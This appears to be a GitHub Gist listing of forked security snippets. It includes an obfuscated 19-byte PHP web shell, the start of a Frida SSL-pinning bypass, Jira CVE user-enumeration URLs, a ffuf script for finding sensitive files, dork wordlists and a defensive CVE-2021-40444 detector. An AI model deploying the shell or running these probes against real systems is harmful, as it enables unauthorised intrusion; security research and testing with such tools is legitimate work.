GH0ST_3exP10it 0xSojalSec

@0xSojalSec
0xSojalSec / rev_shell.php
Created January 28, 2023 18:46 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@0xSojalSec
0xSojalSec / juicy.sh
Created January 2, 2023 14:43 — forked from incogbyte/juicy.sh
fast juicy files with tomnomnom wordlist and ffuf tool
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt
filename="$1"
while read -r line; do
name="$line"
@0xSojalSec
0xSojalSec / mixunpin.js
Created December 11, 2022 17:40 — forked from incogbyte/mixunpin.js
Frida script to bypass common methods of SSL pinning on Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that SSL pinning can be custom, and sometimes you need to reverse it using Ghidra, IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@0xSojalSec
0xSojalSec / bounty_wildcards.json
Created November 4, 2022 20:12 — forked from 0xtavi/bounty_wildcards.json
Bug Bounty Paying Programs Wildcard Domains
{
"programs": [
{
"name": "spacex",
"url": "https://bugcrowd.com/spacex",
"wildcards": [
"starlink.com",
"starlinkisp.net"
],
"out_of_scope_domains": [],
@0xSojalSec
0xSojalSec / Jira bug-exploit
Created November 3, 2022 19:03 — forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================
@0xSojalSec
0xSojalSec / google-dorks
Created November 3, 2022 18:52 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
acc
accept
acceptatie
access
accounts
alpha
alt
api
app
apps
@0xSojalSec
0xSojalSec / Security Engineer - Interview Questions.md
Created August 22, 2022 12:27 — forked from namishelex01/Security Engineer - Interview Questions.md
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names

Core Information Security

  • What is information security and how is it achieved?

  • What are the core principles of information security?

  • What is the CIA triangle?

  • What is non-repudiation (as it applies to IT security)?

Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in, and even if they do, they don’t have any idea what type of questions they might face in an interview.
Recently @Miss_Malware asked for everyone’s favourite security analyst and DFIR interview questions, which gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview.
@0xSojalSec
0xSojalSec / detect_CVE-2021-40444.py
Created August 19, 2022 16:01 — forked from decalage2/detect_CVE-2021-40444.py
Simple script to detect CVE-2021-40444 URLs using oletools
# simple script to detect CVE-2021-40444 exploits in DOCX using oletools
# v0.01 Philippe Lagadec 2021-09-09
# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs.
# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory.
# Moreover, for now only Office 2007+ files are supported.
# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later.
import sys, zipfile
from oletools import oleobj, ooxml